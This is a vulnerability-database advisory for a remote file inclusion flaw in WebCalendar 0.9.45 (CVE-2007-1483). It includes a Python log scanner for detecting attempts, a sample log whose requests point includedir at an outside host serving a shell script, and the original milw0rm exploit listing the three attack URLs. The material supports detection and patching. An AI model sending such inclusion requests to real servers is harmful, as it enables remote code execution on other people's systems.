WebCalendar Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID 1112450 Vulnerability type Code injection
Published 2007-03-15 Updated 2009-02-12
CVE ID CVE-2007-1483 CNNVD ID CNNVD-200703-398
Platform PHP CVSS score 7.5
|Sources
https://www.exploit-db.com/exploits/3492
https://cxsecurity.com/issue/WLB-2007030123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-398
|Details
WebCalendar 0.9.45 contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code by supplying a URL in the includedir parameter of (1) login.php, (2) get_reminders.php or (3) get_events.php, all of which live under the ws/ directory of the installation. As with other PHP remote-include bugs of this period, the remote fetch only succeeds when the PHP configuration permits it (allow_url_fopen, and from PHP 5.2 onward allow_url_include), so those settings are the first thing to check when assessing exposure of an unpatched install.
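As an added example (not part of the original advisory and not WebCalendar's own code), the following Python script scans web-server access-log lines for the request shape this bug is exploited with: a hit on one of the three ws/ scripts with a client-supplied includedir parameter. It classifies the value as a remote URL or PHP stream wrapper (the remote inclusion described here), as an absolute or traversal path (the same include sink would accept those; that is a generalization beyond the advisory), or as a bare probe, since includedir is never a legitimate client parameter. The endpoint paths come from the exploit on this page; the log lines and addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The three scripts named in the advisory, relative to the WebCalendar install root.
VULN_SCRIPTS = ("ws/login.php", "ws/get_reminders.php", "ws/get_events.php")

# Prefixes that make PHP's include() fetch remote content or go through a stream wrapper.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data://", "expect://")

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(target):
    """Inspect one request target (path plus query string).

    Returns (script, kind, includedir_value) when the request hits one of the
    vulnerable scripts with an includedir parameter, else None. kind is "rfi"
    for a remote URL or stream wrapper, "lfi" for an absolute or traversal path,
    and "probe" for any other value.
    """
    parts = urlsplit(target)
    path = parts.path.lower()
    script = next((s for s in VULN_SCRIPTS if path.endswith("/" + s)), None)
    if script is None:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("includedir", []):
        # parse_qs already decoded once; decode again to catch double-encoded values.
        value = unquote(raw).strip()
        low = value.lower()
        if low.startswith(REMOTE_SCHEMES):
            kind = "rfi"
        elif ".." in low or low.startswith("/"):
            kind = "lfi"
        else:
            kind = "probe"
        return script, kind, value
    return None


def scan_log(lines):
    """Return one dict per suspicious request found in an iterable of log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format or a truncated line; skip rather than crash
        found = classify_request(m.group("target"))
        if found is None:
            continue
        script, kind, value = found
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "script": script,
            "kind": kind,
            "includedir": value,
            "status": int(m.group("status")),
        })
    return hits


# Constructed sample log (not real traffic); addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Mar/2007:10:21:33 +0000] "GET /calendar/ws/login.php?includedir=http://198.51.100.9/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [15/Mar/2007:10:21:35 +0000] "GET /calendar/ws/get_events.php?includedir=http%3A%2F%2F198.51.100.9%2Fshell.txt%3F HTTP/1.1" 200 611 "-" "Mozilla/4.0"
192.0.2.44 - - [15/Mar/2007:10:22:01 +0000] "GET /calendar/ws/get_reminders.php?includedir=../includes HTTP/1.1" 200 734 "-" "Mozilla/5.0"
192.0.2.45 - - [15/Mar/2007:10:22:10 +0000] "GET /calendar/ws/get_reminders.php?user=bob HTTP/1.1" 200 734 "-" "Mozilla/5.0"
198.51.100.2 - - [15/Mar/2007:10:23:00 +0000] "GET /calendar/index.php?includedir=http://evil.example/x HTTP/1.1" 200 2048 "-" "curl/7.16"
"""

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG.splitlines()):
        print(f'{h["time"]} {h["ip"]} {h["kind"]:5} {h["script"]} '
              f'includedir={h["includedir"]!r} ({h["status"]})')
```

A 200 response on a flagged request does not by itself prove the include succeeded; confirm by correlating with outbound connections from the web server to the host named in the includedir value, and with the PHP allow_url_fopen / allow_url_include settings on the affected host.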
|Exploit
|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Author  : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64, |
| exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX; |
| |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------

# milw0rm.com [2007-03-15]
|References

Source: BID
Name: 23054
Link: http://www.securityfocus.com/bid/23054
Source: XF
Name: webcalendar-multiple-file-include(33008)
Link: http://xforce.iss.net/xforce/xfdb/33008
Source: BUGTRAQ
Name: 20070315 WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include
Link: http://www.securityfocus.com/archive/1/archive/1/462957/100/0/threaded
Source: BUGTRAQ
Name: 20070320 Re: WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include
Link: http://www.securityfocus.com/archive/1/463288
Source: MILW0RM
Name: 3492
Link: http://www.milw0rm.com/exploits/3492
Source: MLIST
Name: [webcalendar-announce] 20070304 Announce: Release 1.0.5 (security patch)
Link: http://sourceforge.net/mailarchive/forum.php?thread_name=45EAF486.9080902%40k5n.us&forum_name=webcalendar-announce
Source: SREASON
Name: 2425
Link: http://securityreason.com/securityalert/2425